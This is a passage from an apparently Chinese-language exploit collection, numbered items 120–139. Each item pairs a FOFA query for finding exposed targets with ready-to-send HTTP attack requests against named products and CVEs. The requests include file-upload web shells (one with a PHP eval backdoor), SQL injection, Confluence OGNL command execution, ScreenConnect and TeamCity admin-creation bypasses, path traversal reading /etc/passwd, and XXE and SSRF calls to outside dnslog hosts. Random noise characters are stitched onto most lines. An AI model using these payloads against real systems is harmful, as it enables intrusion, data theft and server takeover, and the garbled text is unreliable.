X-Remote-Ip: 1.1.1.1 }( i! _' {/ e2 \5 z
X-Remote-Addr: 1.1.1.13 P1 _- S# ~# |
Te: trailers8 p) p4 Y( u$ J' X
Connection: close
4 k" A, {5 C4 g7 \! ]5 f ]) n2 D6 @/ m& J' @9 O6 B
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456% N6 X+ ~' T$ S8 u
2 E l3 ^6 z0 Y+ G
) ?- t$ b# B$ \4 r120. 北京百绰智能S40管理平台导入web.php任意文件上传
2 `! o1 C* O* @# y& F: PCVE-2024-1253
6 m N* R' E( `) A4 E3 D) [$ iFOFA:title="Smart管理平台", f0 u j+ V, S3 ]/ p% M
POST /useratte/web.php? HTTP/1.1; Q. d) V5 Y( H" @7 E* J+ u8 u
Host: ip:port9 u+ w. Y4 Z, E
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db& C4 Q7 r' D8 }% |+ T* ~. x+ q8 {
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
& \; w! Y' s+ ?: X9 `9 a* h: DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
g. j( z6 j7 J/ G q( XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' X- m0 q6 x1 U* U" v5 i6 c3 UAccept-Encoding: gzip, deflate
0 M* d9 T) R; G# U) c3 ~Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328' U4 x; N" P4 m) K
Content-Length: 597- }% {% q- _$ I8 K) A v4 A
Origin: https://ip:port
& W* y; s6 e. h% i. p) W l; mReferer: https://ip:port/sysmanage/licence.php3 i- X1 i, j" w) X: c
Upgrade-Insecure-Requests: 1' I) k7 y$ ~8 t R. U
Sec-Fetch-Dest: document
! U( W$ I" v \" VSec-Fetch-Mode: navigate. A7 v9 z3 ]: W0 J* k; {; D, y
Sec-Fetch-Site: same-origin
$ D3 y A# T2 eSec-Fetch-User: ?1
) [8 z: K9 k2 k& ^0 ]Te: trailers
/ S' G# x6 B, B1 W3 ~Connection: close+ d& E% E+ I5 f3 T& k6 \! `
9 b, J& R/ n& Z% A-----------------------------42328904123665875270630079328& b: v; i1 y* a" Q
Content-Disposition: form-data; name="file_upload"; filename="2.php": R& Z9 `, @0 `# q4 I
Content-Type: application/octet-stream
# K, _9 ?% B0 U& l7 a) }4 h2 v9 z1 r9 p
! N3 k! m% V3 T1 r1 p- B8 T<?php phpinfo()?>
. i o |, }5 C% J-----------------------------423289041236658752706300793281 D6 L- \) N* {( G
Content-Disposition: form-data; name="id_type"
" D" G! t0 D$ n- \
- n' ?' w P8 D9 `3 u10 W0 W' ?9 {- C8 N/ ]- A# s4 W9 w8 h
-----------------------------42328904123665875270630079328
5 \1 U! M, u/ x" w" rContent-Disposition: form-data; name="1_ck"
, d4 Y2 ], H" O; `$ J
% z2 p8 U4 I1 Y M' R T* Y" z1_radhttp9 G! G" U% ^% L! l U/ ]! \ h
-----------------------------42328904123665875270630079328$ L6 x/ F0 v$ b/ i* P {2 `1 u
Content-Disposition: form-data; name="mode"
5 G; G' I9 x8 a/ ?/ ?6 q
1 T6 U# M, S* b ^4 ]) Uimport
3 Z& v4 }' h* i6 v-----------------------------42328904123665875270630079328( e* {- T$ S$ ?( L$ g8 q, ~* Y' c
6 N4 v% P: R% y3 R3 Q) c
8 J O) S1 e; n1 D
文件路径/upload/2.php
+ p' x: b! M# m
0 E3 i0 ?2 ^/ d8 Y( o T% |3 n121. 北京百绰智能S42管理平台userattestation.php任意文件上传! u: w9 r% Q' e- e6 I' d
CVE-2024-1918
* @# p, T" F, B7 L: U/ d, WFOFA:title="Smart管理平台"
$ J, ~/ j+ I( K! a2 T. H, IPOST /useratte/userattestation.php HTTP/1.1
3 Z) a& Z- a9 w: u1 b/ yHost: 192.168.40.130:8443
2 f1 _9 H$ t6 ICookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
5 A: Z4 ~& M! C7 MUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko6 e% X+ a. V$ H/ p+ T1 h$ a* \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# {8 S8 d2 O% U2 S6 B2 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 {/ q: T1 W' a9 R# I
Accept-Encoding: gzip, deflate
) t% A$ u$ V# F9 i5 }Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' u: b9 z+ }; K" y7 tContent-Length: 592. [+ W; Y0 ~* [. y
Origin: https://192.168.40.130:8443
+ M5 m% t- [; Z y6 q$ XUpgrade-Insecure-Requests: 13 S3 f/ M3 w* V% b9 ~+ G
Sec-Fetch-Dest: document
& _" M4 ?* y- I9 C/ J g, hSec-Fetch-Mode: navigate
' h6 P' q) ~& [" u9 x3 YSec-Fetch-Site: same-origin
% N2 O# s, l0 q# {. G/ G& S# bSec-Fetch-User: ?1 p# h5 ^/ {) \! ^: `2 F# F# @) Q8 H
Te: trailers- e( H0 `9 U; }
Connection: close' I c# S- g! h1 b. S
# u6 V" J9 }$ l3 d k6 H* @/ M
-----------------------------42328904123665875270630079328- Y4 D* @/ J- u7 U
Content-Disposition: form-data; name="web_img"; filename="1.php"7 i+ ]4 X$ v! {/ _7 |0 @+ N' `+ \
Content-Type: application/octet-stream/ C* b& H0 J1 J) l
( k F! X" z) Q. p3 }<?php phpinfo();?>8 h! D0 _% N2 z3 L' f, m( |
-----------------------------42328904123665875270630079328
6 s& m% D+ z- j7 C; k$ n4 ]" M% W1 Y, ^Content-Disposition: form-data; name="id_type"; Y3 `, Q' _6 C9 p8 g* [
! T' d# ^* G% M# p) j) n. i U15 A# {5 ~4 |6 R! l }* b6 f
-----------------------------42328904123665875270630079328
- G) n+ ~' V3 [( K& }Content-Disposition: form-data; name="1_ck"
% [3 }# I* g. O3 Z; a
: ?: k- b }/ i. N9 b. x( z1_radhttp; o0 J1 L! [& a
-----------------------------42328904123665875270630079328: a9 n) y& ]' J; n: s
Content-Disposition: form-data; name="hidwel"$ v2 Y* I! S. J, x' m$ g+ \
2 H/ }5 M3 l7 F3 u% R5 i1 iset
1 _* u3 C/ s+ @! _-----------------------------42328904123665875270630079328
6 D; o6 F) O; z. |& A
$ K% P# g( I5 @( |
- n) H$ Y) y! sboot/web/upload/weblogo/1.php8 A! X3 M# q0 @
+ M. u7 }& }4 k1 r, X! u122. 北京百绰智能s200管理平台/importexport.php sql注入 n% I) Z& y* H, v) z4 G- c+ }
CVE-2024-27718FOFA:title="Smart管理平台"; v. Z* ]' d% w) c9 P1 O. N
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
0 S. A$ O' h. v% Q2 m0 U% \GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
4 ?3 ~* z+ u" ~Host: x.x.x.x. O8 x" v4 ]! I5 s/ x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
- x+ H- c0 H' j7 v7 r; JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 p7 M$ m! B$ ~8 P, j9 G R q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ]! g) [# M' G9 _, eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ v0 ?2 ^2 C- \) T. JAccept-Encoding: gzip, deflate, br) `: h5 Q8 Z1 s' M) n/ k2 m
Upgrade-Insecure-Requests: 1
$ r$ J, u7 }# Z4 t/ aSec-Fetch-Dest: document/ I" Q: U; W- ]" P) @8 G
Sec-Fetch-Mode: navigate) Z; {( e, w7 G5 ~
Sec-Fetch-Site: none- {! c6 H% F# A+ V3 d* c. e9 J" v
Sec-Fetch-User: ?1
% }+ d" _+ p) r. V$ n+ DTe: trailers& |2 k/ ]# P& f' e6 J
Connection: close2 \! Q1 [ D5 B: j, k
. U; F3 k4 v0 W* h R7 I5 E; H
6 z8 s: K6 K+ C0 C' `; s- I) e123. Atlassian Confluence 模板注入代码执行9 _& b* Y; O/ K; R/ H& m& e
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"1 }: K0 L/ ^3 b, n6 S( K# z, @
POST /template/aui/text-inline.vm HTTP/1.1
; G) m' K( h4 Y8 RHost: localhost:8090$ P) v. V0 B4 [ o% w- |( F) C
Accept-Encoding: gzip, deflate, br
s# m2 |) Y$ L8 T. i, [Accept: */*
7 Y0 ^+ u# d5 ^2 U$ Y: h, F: gAccept-Language: en-US;q=0.9,en;q=0.8
5 |. }# R7 M, {7 b% X! N( zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.369 l$ z# o: j7 g3 Z! g, z! k
Connection: close
& i1 ?' S' C' Z7 R X& i) WContent-Type: application/x-www-form-urlencoded- B& f/ r4 m5 |/ m- v* v
0 ` i6 H2 v# V8 ]label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
" k& x, }. x' V7 q- u, E6 |6 c. P, l9 r7 H* p6 l- g
/ I/ P1 ?3 e2 e& s+ N5 f& q' V Z
124. 湖南建研工程质量检测系统任意文件上传
/ Q4 l# E+ `' w4 z* `FOFA:body="/Content/Theme/Standard/webSite/login.css") s! n+ r5 c: D
POST /Scripts/admintool?type=updatefile HTTP/1.1
& ?7 g2 I) U* h9 JHost: 192.168.40.130:8282
9 l3 c9 l' }8 i/ @User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" u+ |4 ~9 m* ~! V v8 lContent-Length: 72# H$ z/ E* { O# }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.80 F" n4 F6 i3 {
Accept-Encoding: gzip, deflate, br
( `% S2 Q! }0 Q( fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- T5 U' }( ~- f0 }$ ^) d
Connection: close$ T3 u6 z9 k2 ~% N
Content-Type: application/x-www-form-urlencoded( ]0 k# }, w% G4 N( C& E3 z, O
# U9 {$ P6 U* `" c1 z
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>& [3 O* p$ b1 Q6 }# L
, T+ p# j0 |1 L8 S1 X3 _$ M: W: f2 x6 K
http://192.168.40.130:8282/Scripts/abcgcg.aspx; u4 I6 M+ x6 D( ?
* ?9 b1 o+ y2 B& M125. ConnectWise ScreenConnect身份验证绕过
9 r/ a2 w7 D* O& `: tCVE-2024-1709
7 t( ^/ j& ]& W0 JFOFA:icon_hash="-82958153"8 { K+ w1 ^. E% v8 @$ F% G$ s
https://github.com/watchtowrlabs ... bypass-add-user-poc) {2 @. y$ f, `9 Y1 E- E
: s& D0 y$ q4 H+ {+ N/ e/ U3 F! ]2 P4 ^
使用方法
$ |& F& k3 q l6 j: D, Z. Zpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
4 ]9 { r p" z* T2 s/ m
6 ?$ \ [$ R6 @; R& R5 e$ a3 y. \- [/ z
创建好用户后直接登录后台,可以执行系统命令。
) j7 U, D: q+ d- B, w j2 K0 A) s2 v1 [. o4 u0 t
126. Aiohttp 路径遍历% P+ |4 J B' u v
FOFA:title=="ComfyUI"
& R5 d; w$ @% b5 N% ~GET /static/../../../../../etc/passwd HTTP/1.1- j, @9 X. n7 @
Host: x.x.x.x! r4 W8 t( C; }, R# T' j5 [ Q1 F. z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" p/ K/ c7 M0 f* F) O ?
Connection: close
" f8 Y T0 a. D/ cAccept: */*
/ n5 S9 M4 v& D6 r x- b7 h4 g1 rAccept-Language: en" i" w! L; k1 @! T, ?' Q) |" v# y
Accept-Encoding: gzip
5 V" R0 d8 |' C
1 f% v# [5 L& z1 E) |6 R0 T
\7 d/ i) _4 O! `) `1 q8 \127. 广联达Linkworks DataExchange.ashx XXE- z. ~5 p. F2 s8 \0 N, K
FOFA:body="Services/Identification/login.ashx" ( q* ~" g" `! [4 h
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
( B! O x- f8 Y% L$ UHost: 192.168.40.130:8888
$ f' V! F6 }+ S/ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
: e' Z5 \' y5 S4 G9 ~# c) ZContent-Length: 415& m1 ?2 A" w% t# h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 b# S" Q; l: p) e0 t* R
Accept-Encoding: gzip, deflate4 c) j6 ~/ s [* E
Accept-Language: zh-CN,zh;q=0.9
+ k$ c; y c2 d9 F+ O, FConnection: close
& d' N! {( j! J& g8 l5 N+ U3 ~Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
, S) `2 {; R7 g4 wPurpose: prefetch6 ^" H& H# U, J, a. @
Sec-Purpose: prefetch;prerender
' j% Z/ y9 J" R3 C& v, V! y' N
) \0 A) V, W9 h------WebKitFormBoundaryJGgV5l5ta05yAIe0" m) A6 S8 M: x0 i
Content-Disposition: form-data;name="SystemName"
9 J) d( i. f2 m: ~
/ H# ~6 r" S2 Y2 r0 [; y( l5 aBIM, a1 ^( C8 Q) }' ~$ t& |) h
------WebKitFormBoundaryJGgV5l5ta05yAIe0
& X0 a* X' G, r8 j |Content-Disposition: form-data;name="Params"
8 z3 {+ e4 i4 U. K' cContent-Type: text/plain+ o2 n" n, m5 \
4 @0 O: p l9 S7 K5 E, b
<?xml version="1.0" encoding="UTF-8"?>$ ~# t2 P0 j8 ^; A9 r
<!DOCTYPE test [+ d# z1 v% S& N! D2 w0 u; a O
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">" A& z8 [) ]4 F: ]
]
% V( R; @5 t. A>9 F# P2 V A6 W J4 ^
<test>&t;</test>
8 j3 H7 |- g$ F% Q' A------WebKitFormBoundaryJGgV5l5ta05yAIe0--: ^+ [/ d# A/ r* k/ }* v2 {
% Z/ r7 Q4 |/ c4 i4 B4 T
0 s* K" T) ]# m+ M: m- d4 E% J) o( Z1 x& ~" t# r, s5 n
128. Adobe ColdFusion 反序列化
& {9 E; u p( h% N* A0 JCVE-2023-38203
$ b( G7 n8 ^' s" [7 R+ ^1 T+ {Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)$ _. N7 ?9 L! }' q! m
FOFA:app="Adobe-ColdFusion"
& i/ \# t. ` G. _5 U EPAYLOAD
% g: `/ N1 d2 z9 C2 U9 g! |4 ?4 d$ O) d8 u
129. Adobe ColdFusion 任意文件读取
2 m: s7 E& c5 @0 B0 {$ DCVE-2024-20767/ o2 C% c5 Q6 W! n8 y5 _
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"- n: a# P0 `; C3 b
第一步,获取uuid* L6 H6 n& Z0 D, D4 q9 {7 L
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
8 q7 k6 {% v& ]* y( r7 DHost: x.x.x.x
7 |; U, y; A. |0 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, A/ J1 l( } ~) V
Accept: */*% B3 V0 }2 v6 S: a& H# L' d
Accept-Encoding: gzip, deflate
% ?0 ?' m7 t* K" q% R! a, s# UConnection: close
/ r8 ^; [7 X1 t0 n% x5 W. \2 i2 H6 j) x- U n# k
; E b; o5 \9 q a5 t7 N第二步,读取/etc/passwd文件+ z3 T u k$ `. p
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1% ^% D' R8 q1 W1 b5 b7 t
Host: x.x.x.x
8 g: q* \; D" Z P7 T1 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 {8 o J6 P) U& B- V! r
Accept: */*
% \+ D5 y3 l; f6 u9 MAccept-Encoding: gzip, deflate& c2 h" y. Y, Y. @3 \9 ]
Connection: close" l9 x) G9 _* T% L+ v" ]9 T
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
; y) l( {( p0 ?- @7 K2 _) R( N, c1 \" k: p8 [1 X; [2 H
& o; W3 g! ?( `. X130. Laykefu客服系统任意文件上传
% P) E( c& h7 V7 j! g7 }FOFA:icon_hash="-334624619"
* k* n& w: U! i, y5 gPOST /admin/users/upavatar.html HTTP/1.1
o* o$ E6 n3 c/ {Host: 127.0.0.1* ^6 m% Q( {6 J
Accept: application/json, text/javascript, */*; q=0.015 W, J/ u- y* i" \3 R
X-Requested-With: XMLHttpRequest
$ E/ A/ b7 A' ]" XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
5 J/ T/ r' w. S( I& p# a yContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR/ t3 E# C& a* X, [3 y
Accept-Encoding: gzip, deflate& d5 p0 m" ~3 A" `3 q7 {' q/ N
Accept-Language: zh-CN,zh;q=0.9
8 [5 l, N; v3 ICookie: user_name=1; user_id=3
7 i' }7 a5 h& d6 r* e; @7 C7 r$ T9 NConnection: close
# m+ d7 @9 e6 s/ b4 Y0 e2 o# S* v/ X9 H7 Q
------WebKitFormBoundary3OCVBiwBVsNuB2kR3 w) m9 j; G. m( F0 F1 K0 H
Content-Disposition: form-data; name="file"; filename="1.php"! }0 l, n4 G* i' Q) t
Content-Type: image/png; s$ P5 R: Q; H2 e' G
! h( W; k" U) _6 r7 x<?php phpinfo();@eval($_POST['sec']);?>
) g( s4 k2 P/ ?- f+ I------WebKitFormBoundary3OCVBiwBVsNuB2kR--1 ]( D. o1 O# ^& A$ c0 w1 _6 G
' U' V* X4 L }' @! s$ f; J/ X: F: ?7 G. m* C/ @' f" b
131. Mini-Tmall <=20231017 SQL注入& H/ i3 Q4 p9 J5 s! [
FOFA:icon_hash="-2087517259"
, G/ G- G6 \/ W. j! o+ \1 c3 D$ _后台地址:http://localhost:8080/tmall/admin
* F/ w! w' k4 [0 l5 Vhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
! E* K( z! j- E5 p% B+ X! F" `* X. x8 c2 e, c8 j. [
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 R. N$ p; H: P& f; E- S
CVE-2024-27198
# B' F$ _& ^' o* S1 Q L/ d }FOFA:body="Log in to TeamCity"2 H: Q( n* E4 c- @) B+ V4 ]5 x. O8 T
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
: [+ R' K. B: V+ Q3 Y( FHost: 192.168.40.130:8111
7 ^: ]# o( k) D1 W8 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 A. @6 o# Q# Q* z$ e' c4 G& P' O
Accept: */*2 x2 ]+ _: l2 L
Content-Type: application/json M9 i, f+ [" Y, n! M0 Z
Accept-Encoding: gzip, deflate2 K, N M! }: I
$ g7 h3 }3 e @+ G2 X
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
* _+ R% R5 O8 e) N7 q1 y2 b; t
0 b5 u8 W, L5 A
7 p3 Y/ l4 d% Z: B, Q0 W' ]$ eCVE-2024-27199/ h& F0 V2 \* N7 m' Z3 c
/res/../admin/diagnostic.jsp# G0 f1 _6 T' V2 e+ P
/.well-known/acme-challenge/../../admin/diagnostic.jsp
H# }2 r4 U( r; `8 V9 y/update/../admin/diagnostic.jsp4 o9 q9 Z/ d3 i( o. _* b y
1 \2 I* r1 a! @' z2 o: r7 \- |
- E9 I$ Y3 \ C# S8 q* p8 Y8 `CVE-2024-27198-RCE.py n0 s# ]1 r, U/ O4 N
1 @& f( [* u T( x9 Q( W! B$ b# G
133. H5 云商城 file.php 文件上传0 @6 N$ m) p. ^. G; R7 |8 F+ W
FOFA:body="/public/qbsp.php"4 Y! C# `) j! @4 D8 J$ X' K
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
4 }2 a" `& N2 qHost: your-ip
7 W' }7 R p: S4 q z* i+ KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 A/ F Q! O* R! ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
# f' a! A5 N& q& e- X- y' y
2 D4 z; N0 l0 k6 T& Y7 j2 F------WebKitFormBoundaryFQqYtrIWb8iBxUCx: l/ J. r; x8 Q5 C2 R
Content-Disposition: form-data; name="file"; filename="rce.php"' i6 L# g7 g. O, q. \
Content-Type: application/octet-stream( \8 S- u6 r" t/ f, o, ^ E
- s; N* ~5 N+ V. m<?php system("cat /etc/passwd");unlink(__FILE__);?>: n0 ~+ k( b1 o9 b7 X
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--+ H5 r6 d) s, P8 _
- F4 v( N2 {( b, ~& Z
! f9 J2 o0 r& [4 J+ a+ U/ X6 Z: D5 j: f) `1 C
134. 网康NS-ASG应用安全网关index.php sql注入6 @" f! Z( i1 X: g z
CVE-2024-2330
. p9 p7 T9 j% P$ d8 u/ {) ONetentsec NS-ASG Application Security Gateway 6.3版本
. a+ X7 ?" g1 L4 g5 S2 R. dFOFA:app="网康科技-NS-ASG安全网关"
* q# u9 D% j! Q- IPOST /protocol/index.php HTTP/1.1
1 R& W* H8 g0 H4 K$ NHost: x.x.x.x
6 k. H, T2 g7 T8 bCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
! j4 [; V" k, p tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& {4 T. k- x- T4 J
Accept: */*
0 s# K0 W# x6 G' Q- qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, {5 G, T6 l+ Z! p Q* P
Accept-Encoding: gzip, deflate6 k% U/ p2 X2 D7 L# c$ H
Sec-Fetch-Dest: empty
/ W3 y' ~6 H+ M) PSec-Fetch-Mode: cors* i/ v8 D% ?* s$ z t6 p4 ~
Sec-Fetch-Site: same-origin( L' i5 C: K( b/ I! m
Te: trailers
- O7 O1 }, [, h8 D# d! L# G& QConnection: close7 q0 l: l, P6 z6 y, L. U" w
Content-Type: application/x-www-form-urlencoded0 _* q1 G, G/ W6 \9 P( X
Content-Length: 263( S$ M$ j5 Z2 K! g9 s/ a
+ Z3 R- N6 ` F' @, H+ e6 l L
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
9 U( f' }# V8 d4 _, \+ j1 Q+ X, Z5 s. {4 B" p; K5 Y+ H8 s
' k6 d; x8 Z( t+ f
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入! x N0 r" K; v
CVE-2024-2022
{$ L5 {4 T$ A3 ]) T# INetentsec NS-ASG Application Security Gateway 6.3版本
0 _+ \3 o: [5 `. I- G2 oFOFA:app="网康科技-NS-ASG安全网关"
' z# E: s1 R) C( N# i8 |, tGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1% a2 Y; P8 q9 {
Host: x.x.x.x
4 L; o* F! Q# m4 s4 P5 f" U1 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ m3 o. Z$ P# k+ V# c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& A% t/ W' E5 m5 J6 _
Accept-Encoding: gzip, deflate9 h+ I- D# K# \; i2 @3 ]( Y
Accept-Language: zh-CN,zh;q=0.9
6 B9 {6 K9 Q; G, n' m6 nConnection: close
f8 ~. i. ?; q( _# I/ S4 d8 W
! {2 A* \7 `( {$ G
/ B- h0 ^7 D0 l5 N# r( F5 c2 { ]136. NextChat cors SSRF' @/ U$ F o" \7 E
CVE-2023-49785
/ w! }& Q; D) t0 @) q3 {/ CFOFA:title="NextChat"; T9 @1 j8 T! y6 M
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
7 X5 J7 l" d7 y8 y' GHost: x.x.x.x:100000 H. C7 ?' z9 u' b. z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 a+ Y: L# n/ i2 c
Connection: close8 r0 W; C5 l/ `4 N- E3 Z
Accept: */*
# i, W1 }, Q& v6 k( \Accept-Language: en5 i Q3 j( y1 k% i
Accept-Encoding: gzip! i7 ^" R& G4 E1 T9 s2 _, ]
' X% v* w, F: Q1 |
1 L5 @( _- C% H2 D137. 福建科立迅通信指挥调度平台down_file.php sql注入
3 G8 O* L+ u, I$ ^9 [6 GCVE-2024-2620
% m C. s8 E4 `. P5 S. a. rFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; P4 B( A- ^4 H% e1 c) {GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
/ E% m# Q9 V; Z% h7 e5 O* n2 s" vHost: x.x.x.x
* p- _8 d4 B2 ^( x; TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, H; \. f+ C5 y0 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 N- } R( F2 t* p4 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# }9 H, U* W) vAccept-Encoding: gzip, deflate, br
8 I. f3 m9 q* U& v. i# NConnection: close
& d) ?/ j$ n; v# ]Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
0 R9 H# ?$ B! qUpgrade-Insecure-Requests: 1
% e W9 r* V$ A+ U$ l. Y
2 a$ |, ?! X O: O. b$ j9 ~* _4 m r& N# q+ G8 n
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入) M- ~+ M. ?. ]/ x
CVE-2024-2621
' }0 I. t# [0 SFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 | Y# M8 V! T
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1- m0 N, j& f) k. u! q
Host: x.x.x.x
8 ]; ~1 w. f( V" h2 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 y, k; M2 k0 V0 @2 J: {- \0 s7 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 o7 [& F, @$ l) Q) g2 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, T3 I6 n6 S8 E7 q$ |+ _Accept-Encoding: gzip, deflate, br0 i/ e3 @1 ^ g) c
Connection: close, f, r9 u1 r, G0 B
Upgrade-Insecure-Requests: 1
1 O" C: y$ p! z
g9 ^9 e! d9 k [8 @/ m, ~5 T! ]! D% A5 l
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& A# r4 S6 b& bCVE-2024-2622
+ |2 k$ X. q N; A) YFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: M% O6 X, C; ^1 c/ a' c/ nGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
